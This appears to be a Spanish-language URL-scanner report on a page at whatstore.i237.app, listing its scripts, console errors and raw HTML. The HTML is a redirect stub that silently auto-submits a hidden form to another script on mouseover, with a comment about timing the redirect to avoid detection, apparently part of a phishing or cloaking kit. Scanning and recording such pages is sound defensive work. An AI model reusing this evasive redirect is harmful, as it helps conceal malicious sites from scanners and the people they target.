https://whatstore.i237.app/r.php

ID de exploración:
76afb550-275c-4f35-9eff-ba6fbced50dbFinalizado
URL enviada:
https://whatstore.i237.app/r.php
Informe finalizado:

Enlaces: 0 encontrados

Los enlaces salientes identificados en la página

Variables JavaScript: 5 encontradas

Las variables JavaScript globales cargadas en el objeto de ventana de una página son variables declaradas fuera de las funciones y a las que se puede acceder desde cualquier lugar del código en el ámbito actual

NombreTipo
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
sleepfunction
onLoadfunction

Mensajes de registro de la consola: 1 encontrados

Mensajes registrados en la consola web

TipoCategoríaRegistrar
errornetwork
URL
https://whatstore.i237.app/favicon.ico
TEXTO
Failed to load resource: the server responded with a status of 404 ()

HTML

El cuerpo HTML sin procesar de la página

<html><head></head><body onmouseover="onLoad()" id="bot">
<script>
    function sleep(ms) {
        return new Promise(resolve => setTimeout(resolve, ms));
    }
    async function onLoad() {
        await sleep(1000); // Wait time before effective url redirection - Anything under 5000 may be detected so change at your own risk.  
        document.form.submit();
    }
</script>


    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
    <style>
        /* Custom spinner size */
        .spinner-border {
            width: 10rem;
            height: 10rem;
            border-width: 1rem;
        }
    </style>


<div style="width: 100%; height: 100%; padding-top: 20%; padding-bottom: 20%;" class="text-center">
    <!-- Larger custom spinner -->
    <div class="spinner-border text-primary" role="status">
    </div>
</div>

<form method="POST" name="form" id="form" action="rrt.php">
    <input name="e84c04c00c8e6f1117a0c7c603adab81" type="hidden" value="63941c96eba2ce27cfbbeebefc9dfb8a">
</form>



</body></html>